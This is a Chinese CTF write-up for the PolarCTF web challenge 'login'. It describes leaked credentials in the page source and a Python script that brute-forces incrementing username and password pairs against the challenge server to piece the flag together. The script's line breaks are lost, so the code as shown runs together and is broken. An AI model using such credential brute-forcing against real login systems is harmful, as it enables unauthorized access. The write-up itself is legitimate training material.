Polar Web【简单】login

本文旨在记录此题的探索和解决过程。

探索&思路

• 查看源码，发现存在用户信息泄露。
• 尝试用获取信息登录，显示成功，但其后没有可做的操作。
• 经尝试，username和password同时递增也会登录成功，并回显一些字符。经过拼凑发现，结果即为目标flag。

具体情况可参考下图：

EXP (python)

import requestsif __name__ == '__main__':for i in range(20200102, 20200120):# 此题不一定需要headers = {"Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.9",}# 构造用户名和密码data = {"username": f"{i}","password": f"{i}",}# 发出POST请求res = requests.post('http://~.www.polarctf.com:8090/',data=data, headers=headers)out = str(res.content.decode('utf8'))# # 确认目标字符的下标# print(out.rindex('f') - len(out))# 每次输出目标字符print(out[-5], end='')

结果&总结

• 本题如果少了必要的探索过程，难以知悉有这样的爆破思路
• 同时尝试了独立用脚本实现爆破过程